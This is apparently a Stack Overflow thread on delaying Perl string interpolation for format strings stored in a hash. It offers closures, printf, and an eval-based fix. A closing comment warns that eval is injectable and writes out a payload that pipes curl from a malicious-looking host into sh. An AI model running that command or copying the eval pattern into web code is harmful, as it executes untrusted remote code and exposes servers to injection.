# interpolation of hashed format string

Tags: perl, hash, interpolation, string-interpolation

I am working on a perl cgi-script.
It should handle some kind of database where print layouts and the values to print are stored in a hash. Here comes my code snippet:

```
    my $va=1;
    my $vb=2;
    my $fa="";
    my $fb="";
    my %h=( 'format' => { 'a' => "This is the value of variable \$va: $va",
                          'b' => "This is the value of variable \$vb: $vb"
                        },
            'values' => { 'a' => "value A",
                          'b' => "value B"
                        }
          );
    $fa=$h{'format'}->{'a'};
    $fb=$h{'format'}->{'b'};
    $va=$h{'values'}->{'a'};
    $vb=$h{'values'}->{'b'};
    print "$fa<br/>\n";
    print "$fb<br/>\n";
    $va=3;
    $vb=4;
    print "$fa<br/>\n";
    print "$fb<br/>\n";
```

Until now I got only this (wrong) printout:

```
   This is the value of variable $va: 1
   This is the value of variable $vb: 2
   This is the value of variable $va: 1
   This is the value of variable $vb: 2
```

What I do expect is:

```
   This is the value of variable $va: value A
   This is the value of variable $vb: value B
   This is the value of variable $va: 3
   This is the value of variable $vb: 4
```

What could be the reason that the interpolation of the format-strings stored in the hash does not work?

Comment: The interpolation happens when the hash is initialized (`my %h =`), not when it's accessed, so `$va` is still 1 and `$vb` is 2. This seems like an [XY problem](http://meta.stackexchange.com/q/66377/234299), though...can you please explain more about what you're trying to do?

Comment: @ThisSuitIsBlackNot Yes You are right. I changed now the double quotas from ... 'a' => " ... " to 'a' => ' ... '. The hash is now not interpolatable and so initialized without interpolation. But the printout gives:
This is the value of variable \$va: $va
This is the value of variable \$vb: $vb
Also not interpolated - why?

Comment: At first glance I think `eval` is a keyword here...

Comment: @ThisSuitIsBlackNot,@perl-dog I've tried to eval() after getting the strings out of the hash, tried to eval() the print in several variants - but nothing is working for me.

Answer (score 2):

To delay the interpolation, the easiest way is to use anonymous subs:

```
    my $va=1;
    my $vb=2;
    my $fa="";
    my $fb="";
    my %h=( 'format' => { 'a' => sub { "This is the value of variable \$va: $va" },
                          'b' => sub { "This is the value of variable \$vb: $vb" },
                        },
            'values' => { 'a' => "value A",
                          'b' => "value B",
                        }
          );
    $fa=$h{'format'}->{'a'};
    $fb=$h{'format'}->{'b'};
    $va=$h{'values'}->{'a'};
    $vb=$h{'values'}->{'b'};
    print $fa->() . "<br/>\n";
    print $fb->() . "<br/>\n";
    $va=3;
    $vb=4;
    print $fa->() . "<br/>\n";
    print $fb->() . "<br/>\n";
```

That said, use a templating system instead.

Comment: I found a solution by myself, but this is a really nice looking one. Testing it I got this error: Can't use string ("This is the value of variable \$"...) as a subroutine ref while "strict refs" in use ..

Comment: then you forgot to add the `sub { ... }` around the strings

Answer (score 1):

As @ThisSuitIsBlackNot already noted, this might me an XY problem. Perhaps `[s]printf` might help you:

```
my %h=( 'format' => { 'a' => "This is the value of variable \$va: %s",
                      'b' => "This is the value of variable \$vb: %s"
                    },
        'values' => { 'a' => "value A",
                      'b' => "value B"
                    }
      );

printf( $h{format}{a}, $h{values}{a} );
```

This is equivalent to

```
printf( "This is the value of variable \$va: %s", 'value A' );
```

Which gives:

```
This is the value of variable $va: value A
```

Comment: `printf` is to templating what `vi` is to integrated development environments!

Comment: @mob :-P you are right, it's not particularly _state of the [intentionally left blank]_ but this could have solved the OP's problem. However, I'm happy he found a far better solution.

Answer (score 0):

I found a solution at http://www.perlmonks.org/?node_id=408346

the strings have to be 'requoted':

```
    sub quote { qq!"$_[0]"! } # Use something more sophisticated which escapes properly.

    my $va=1;
    my $vb=2;
    my $fa="";
    my $fb="";

    my %h=( 'format' => { 'a' => 'This is the value of variable \$va: ${va}',
                          'b' => 'This is the value of variable \$vb: ${vb}'
                        },
            'values' => { 'a' => 'value A',
                          'b' => 'value B'
                        }
          );
    $fa=$h{'format'}->{'a'};
    $fb=$h{'format'}->{'b'};
    $va=$h{'values'}->{'a'};
    $vb=$h{'values'}->{'b'};
    print eval(quote($fa))."<br/>\n";
    print eval(quote($fb))."<br/>\n";
    $va=3;
    $vb=4;
    print eval(quote($fa))."<br/>\n";
    print eval(quote($fb))."<br/>\n";
```

Now the printout is like wanted:

```
    This is the value of variable $va: value A
    This is the value of variable $vb: value B
    This is the value of variable $va: 3
    This is the value of variable $vb: 4
```

cheers.

Comment: Nice. So I wasn't completely wrong with that `eval` guess ;-) Thanks for showing your solution so other people can benefit.

Comment: Use a real templating system before somebody sets `$h{"values"}{"a"}` to `";system('curl http://maliciouscode.com/script19.php | sh');"Don't worry. Everything is ok`